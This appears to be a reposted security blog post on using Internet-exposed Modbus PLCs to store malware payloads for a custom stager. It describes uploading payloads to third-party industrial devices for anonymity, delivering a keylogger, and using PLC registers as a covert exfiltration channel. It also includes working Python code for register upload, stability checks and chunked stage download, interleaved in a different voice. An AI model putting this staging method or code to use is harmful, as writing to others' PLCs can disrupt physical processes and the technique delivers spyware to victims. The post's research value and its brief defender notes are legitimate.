Using a PLC as a payload/shellcode distribution system

Source: Internet
Author: User
Tags: python, script

This weekend I have been tinkering with Modbus and wrote a stager in assembly that downloads its payload from a PLC's holding registers. Since a large number of PLCs are exposed to the Internet, I could not help wondering whether the memory they offer could be used to store a payload that a stager later retrieves.

So, we might consider the following scenario:

1. The attacker searches the Internet for a PLC with enough free holding-register space to store the payload. Modbus devices with tens of KB of memory are easy to find.

2. The attacker uploads the payload into the PLC's holding registers.

3. The attacker infects a host with a dropper whose stager speaks Modbus to the PLC, downloads the stage from its holding registers and executes it.

Advantages of storing the payload in PLC holding registers

Because the payload lives on a third-party PLC, the attacker gains anonymity and attribution becomes difficult: there is no need to host the payload on a server of their own.

Storing the payload in PLC memory also complicates forensic analysis. Once the payload is no longer needed, the registers can be overwritten easily (the stager itself could do this after downloading the stage).

A Modbus stager is also useful inside some ICS environments, where traffic on protocols other than Modbus may raise alerts, so a WinHTTP/WinINet stager is not the best fit. In that case all that is needed is a Modbus handler or a simple emulator that serves the stage when the stager connects to it. Many of these networks also contain Modbus devices that can be managed remotely, which makes them usable for this stager as well.

Important: do not perform these operations against any third-party PLC. Any write to a PLC's registers may disrupt the process-control strategy it is running.

How many Internet-facing PLCs speak Modbus

To get an idea of how many Modbus PLCs are exposed to the Internet, I wrote a small script that queries the Censys API. If your network link can take it, you can instead scan the Internet yourself for devices answering Modbus on TCP port 502 with tools such as Masscan or ZMap.

From the script's output, at least 5,500 such PLCs are reachable.

Many of these IPs are clearly honeypots, for example Conpot instances hosted at cloud providers. For the purposes of this article a honeypot is fine too, as long as it exposes enough register memory.

Uploading the payload to the PLC's holding registers

To upload the payload to the PLC I wrote a Python script, plcinjectpayload.py. How much register space is free depends on the control strategy loaded on the PLC, so the script first checks whether the device has enough room for the payload. To do this it sends a Modbus Read Holding Registers request (function code 0x03) for the register (each holding register is 16 bits) at the address where the payload would end. If the device answers with an exception response (function code 0x83, i.e. 0x03 with the high bit set, normally carrying exception code 0x02, "illegal data address"), that PLC is of no use to us.

To upload a payload, use the -upload option. The -addr parameter sets the holding-register address at which the payload starts (address 0 if unspecified).

If the payload has an odd number of bytes it is padded with a 0x90 byte (a NOP) so that it fills whole 16-bit registers and reads back cleanly. In the previous example the payload is 1536 bytes. To check that the upload succeeded, the -download option reads the same number of bytes back from address 0.

The script is not limited to shellcode: it can upload any kind of file. That makes it an interesting channel for exfiltrating and sharing data. Who would suspect that a public PLC's holding registers contain a .docx or .zip file?

Bear in mind that the registers holding the payload may be modified by the PLC itself. Since we do not know the PLC's I/O map and control strategy, we need to find a memory range that is not normally written. To do this, upload the payload into a range and read it back repeatedly over a period of time; if after many checks it has not changed, that range is the one we are looking for. This can be done with plcinjectpayload.py and a few bash commands.
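The space check, the padded and chunked upload, the read-back and the stability check described above, as an added example in Python. This is not the post's plcinjectpayload.py; the frame layouts follow the Modbus/TCP specification, while FakePLC (an in-memory register map so the example runs offline, with a few "volatile" registers standing in for ones the control strategy keeps updating), has_room, upload, download and is_stable are names chosen here. Against a real device the same frames would go over a TCP socket to port 502, which, as the post warns, must not be done to third-party PLCs.

```python
import struct

READ_HOLDING = 0x03      # FC 03, Read Holding Registers
WRITE_MULTIPLE = 0x10    # FC 16, Write Multiple Registers
MAX_READ_REGS = 125      # spec limit per read: 250 bytes
MAX_WRITE_REGS = 123     # spec limit per write: 246 bytes
ILLEGAL_FUNCTION, ILLEGAL_DATA_ADDRESS = 0x01, 0x02


class ModbusError(Exception):
    """Raised when the device answers with an exception response (FC | 0x80)."""
    def __init__(self, fc, code):
        super().__init__(f"exception response fc=0x{fc:02x} code={code}")
        self.fc, self.code = fc, code


def mbap(pdu, unit=1, tid=1):
    """Modbus/TCP header: transaction id, protocol 0, length (unit + PDU), unit id."""
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def read_request(addr, count):
    return mbap(struct.pack(">BHH", READ_HOLDING, addr, count))


def write_request(addr, data):
    """data must be whole 16-bit registers; bytes go on the wire as big-endian words."""
    return mbap(struct.pack(">BHHB", WRITE_MULTIPLE, addr, len(data) // 2, len(data)) + data)


def parse_response(frame):
    """Return the data bytes of a read, b'' for a write, or raise ModbusError."""
    fc = frame[7]
    if fc & 0x80:
        raise ModbusError(fc, frame[8])
    return frame[9:9 + frame[8]] if fc == READ_HOLDING else b""


class FakePLC:
    """Constructed stand-in for a PLC: a fixed holding-register map. Registers in
    `volatile` are rewritten on every exchange, like process-updated registers."""
    def __init__(self, nregs, volatile=()):
        self.regs, self.volatile, self.ticks = [0] * nregs, set(volatile), 0

    def exchange(self, frame):
        self.ticks += 1
        for a in self.volatile:
            self.regs[a] = self.ticks & 0xFFFF
        tid, _, _, unit, fc, addr, count = struct.unpack(">HHHBBHH", frame[:12])
        if fc not in (READ_HOLDING, WRITE_MULTIPLE):
            return struct.pack(">HHHBBB", tid, 0, 3, unit, fc | 0x80, ILLEGAL_FUNCTION)
        if addr + count > len(self.regs):   # beyond the map -> 0x83 / 0x90 + code 2
            return struct.pack(">HHHBBB", tid, 0, 3, unit, fc | 0x80, ILLEGAL_DATA_ADDRESS)
        if fc == READ_HOLDING:
            data = b"".join(struct.pack(">H", r) for r in self.regs[addr:addr + count])
            return struct.pack(">HHHBBB", tid, 0, 3 + len(data), unit, fc, len(data)) + data
        data = frame[13:13 + frame[12]]
        for i in range(count):
            self.regs[addr + i] = struct.unpack(">H", data[2 * i:2 * i + 2])[0]
        return struct.pack(">HHHBBHH", tid, 0, 6, unit, fc, addr, count)


def has_room(plc, addr, nbytes):
    """The post's space check: read the register where the payload would end.
    An exception response means that address is outside the device's map."""
    last = addr + (nbytes + 1) // 2 - 1
    try:
        parse_response(plc.exchange(read_request(last, 1)))
        return True
    except ModbusError:
        return False


def upload(plc, payload, addr=0):
    """Pad an odd length with 0x90 (NOP), then write chunks of <= 123 registers."""
    if len(payload) % 2:
        payload += b"\x90"
    for off in range(0, len(payload), 2 * MAX_WRITE_REGS):
        chunk = payload[off:off + 2 * MAX_WRITE_REGS]
        parse_response(plc.exchange(write_request(addr + off // 2, chunk)))
    return len(payload)


def download(plc, addr, nbytes):
    """Read nbytes back in chunks of <= 125 registers (250 bytes)."""
    nregs, out = (nbytes + 1) // 2, b""
    for off in range(0, nregs, MAX_READ_REGS):
        count = min(MAX_READ_REGS, nregs - off)
        out += parse_response(plc.exchange(read_request(addr + off, count)))
    return out[:nbytes]


def is_stable(plc, addr, nbytes, checks=5):
    """Re-read the range `checks` times; any difference means the process writes
    into it. On a real device, spread the checks out over time."""
    first = download(plc, addr, nbytes)
    return all(download(plc, addr, nbytes) == first for _ in range(checks - 1))
```

The stability check is the part worth keeping even if you never touch a PLC: a range that reads back identically after several checks spaced over time is the only kind of register space a stager can rely on, and a range that drifts is the detection signal a defender would look for.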

Reading the payload from the PLC on the compromised host

Once the payload is on the PLC it has to be read from the victim machine. For that I built a Modbus-based stager of under 500 bytes (I will try to make it smaller). Its reverse_tcp and block_api code is taken from Metasploit (https://github.com/rapid7/metasploit-framework/tree/master/external/source/shellcode/windows/x86/src/block). The part that fetches the payload over Modbus is block_recv_modbus.asm, which therefore has to speak Modbus to the PLC. The code reads the first 4 bytes to learn the stage size and allocates the necessary memory with VirtualAlloc; it then retrieves the stage with successive Read Holding Registers requests (function code 0x03). According to the protocol a single read may return at most 125 holding registers (250 bytes), so the stager downloads the payload in chunks of that size.

A worked example

Let's look at a practical example. I recently found a Windows keylogger on www.exploit-db.com of only 600 bytes; small as it is, it is enough for a PoC that needs only a few Modbus requests (remember that each request returns at most 250 bytes). Once the shellcode runs, keystrokes are written to a log.bin file in the user's %temp% directory.

So first we put the payload in a binary file, prefixed with its length as a 4-byte little-endian value.

Now let's upload it to the PLC starting at address 0:

Once the stager runs, it downloads the payload in three requests: 250 + 250 + 102 = 602 bytes. The Modbus exchange was captured in detail.
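The stager's download loop and the handler side of the exchange, as an added example in Python. This is neither the post's block_recv_modbus.asm nor its plcmodbushandler.py: StageHandler is a constructed in-memory Modbus handler that serves a length-prefixed stage from a fixed register map and logs each read, and fetch_stage is the client logic the post describes (4-byte little-endian length, then 125-register reads). The post does not say whether the real stager fetches the length prefix on its own or inside the first full read; this version folds it into the first 250-byte read, which is what yields the post's count of 250 + 250 + 102 = 602 bytes in three requests for a 598-byte stage plus its 4-byte prefix (the 598-byte stage here is a constructed stand-in for the roughly 600-byte keylogger).

```python
import struct

READ_HOLDING = 0x03
MAX_READ_REGS = 125   # 250 bytes per request is the protocol's ceiling


class StageHandler:
    """Constructed stand-in for a Modbus handler/emulator. Holds a fixed register
    map with <u32 little-endian length><stage> placed at register `base`, answers
    FC 03 reads, and logs every (addr, count) it receives."""
    def __init__(self, stage, base=0, nregs=1024):
        blob = struct.pack("<I", len(stage)) + stage
        if len(blob) % 2:
            blob += b"\x90"                       # keep whole 16-bit registers
        image = bytearray(2 * nregs)
        image[2 * base:2 * base + len(blob)] = blob
        self.image, self.requests = bytes(image), []

    def exchange(self, frame):
        tid, _, _, unit, fc, addr, count = struct.unpack(">HHHBBHH", frame[:12])
        self.requests.append((addr, count))
        if fc != READ_HOLDING or not 1 <= count <= MAX_READ_REGS:
            return struct.pack(">HHHBBB", tid, 0, 3, unit, fc | 0x80, 0x03)
        data = self.image[2 * addr:2 * (addr + count)]
        if len(data) < 2 * count:                 # off the end of the map
            return struct.pack(">HHHBBB", tid, 0, 3, unit, fc | 0x80, 0x02)
        return struct.pack(">HHHBBB", tid, 0, 3 + len(data), unit, fc, len(data)) + data


def read_request(addr, count, unit=1, tid=1):
    """Modbus/TCP Read Holding Registers frame: MBAP header + FC 03 PDU."""
    pdu = struct.pack(">BHH", READ_HOLDING, addr, count)
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def fetch_stage(device, base=0):
    """Stager logic: the first full-size read returns the 4-byte length prefix and
    the first 246 stage bytes; keep reading 125-register chunks (the last one
    trimmed to what is missing) until the whole stage is in hand."""
    def read(addr, count):
        resp = device.exchange(read_request(addr, count))
        if resp[7] & 0x80:
            raise RuntimeError(f"Modbus exception code {resp[8]}")
        return resp[9:9 + resp[8]]

    first = read(base, MAX_READ_REGS)
    size = struct.unpack("<I", first[:4])[0]      # the value the asm hands to VirtualAlloc
    stage = first[4:4 + size]
    while len(stage) < size:
        want = min(size - len(stage), 2 * MAX_READ_REGS)
        addr = base + (4 + len(stage)) // 2       # bytes consumed so far -> next register
        stage += read(addr, (want + 1) // 2)[:want]
    return stage


def request_sizes(device):
    """Bytes returned per request, to compare with the post's 250 + 250 + 102."""
    return [2 * count for _, count in device.requests]
```

The same loop is what a network sensor sees from the other side: a client that issues a full 125-register read and then walks forward in 125-register steps from a fixed base, finishing with a shorter read, is a download pattern rather than a polling pattern, which is a useful thing to alert on in a Modbus-only segment.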

The capture of the exchange is shown in Wireshark, and the Process Monitor window shows the stage running successfully (opening log.bin reveals the saved keystrokes).

I have verified this code against both a Modbus emulator and a real PLC and everything works, although, as mentioned above, I think the shellcode can be optimized further. For the first tests I wrote a Modbus handler in Python (plcmodbushandler.py) that serves the payload to the stager.

I am working on porting this handler to Metasploit. For more details, see the video in the original post (linked below).

Reference Link: http://bobao.360.cn/learning/detail/3311.html

Original link: http://www.shelliscoming.com/2016/12/modbus-stager-using-plcs-as.html
